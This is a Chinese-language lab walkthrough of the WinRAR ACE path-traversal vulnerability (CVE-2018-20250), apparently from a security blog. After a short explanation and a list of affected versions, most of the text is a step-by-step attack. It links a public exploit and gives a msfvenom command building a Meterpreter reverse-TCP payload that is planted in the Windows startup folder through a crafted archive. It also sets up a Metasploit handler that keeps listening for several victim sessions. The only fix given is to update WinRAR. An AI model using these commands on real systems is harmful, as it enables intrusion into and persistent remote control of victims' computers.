目录
漏洞介绍
Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。
该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时,由于没有对文件名进行充分过滤,导致其可实现目录穿越,将恶意文件写入任意目录,甚至可以写入文件至开机启动项,导致代码执行
漏洞影响
- WinRAR < 5.70 Beta 1
- Bandizip < = 6.2.0.0
- 好压(2345压缩) < = 5.9.8.10907
- 360压缩 < = 4.0.0.1170
漏洞复现
1. 下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250
将下载文件放入到kali中
2. 利用msfvenom生成恶意文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.129 lport=1234 -f exe >./test.exe3.编辑winrar漏洞exp文件
vim exp.py
修改python3的运行命令
修改完成之后进行保存
4. 运行exp生成恶意rar文件
5. 把恶意test.rar文件传到win7靶机
6. 下载含漏洞版本的winrar软件
这里下载的winrar5.5.0, https://dwd.jb51.net/201102/tools/WinRAR_x64_SC.exe
7. msf开启监听
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 1234
- run
8. winrar解压文件
执行一键解压
解压后会在自启动目录生成一个恶意文件hi.exe,我们可以运行 shell:startiup进行查看
当电脑重启后就会自动运行该文件,这里重启电脑!然后查看msf监听的是否上线
如下,成功与受害机器建立了sessions会话
msf持续监听
一般我们执行exploit 启动 handler 后,在收到sessions 后就会停止监听端口,如果你还想要继续接受弹回来的另外一台主机的会话的话,那得还要运行一次exploit 命令,这样显得有些碍手碍脚。所以这里为了能够持续地监听弹回来的主机,可以运行如下命令
- sf6 exploit(multi/handler) > set ExitOnSession false #持续监听
- msf6 exploit(multi/handler) > exploit -j #攻击在后台进行,一般建立起sessions后自动进入meterpreter会话,加-j参数则不进入meterpreter
漏洞修复
更新winrar到最新版本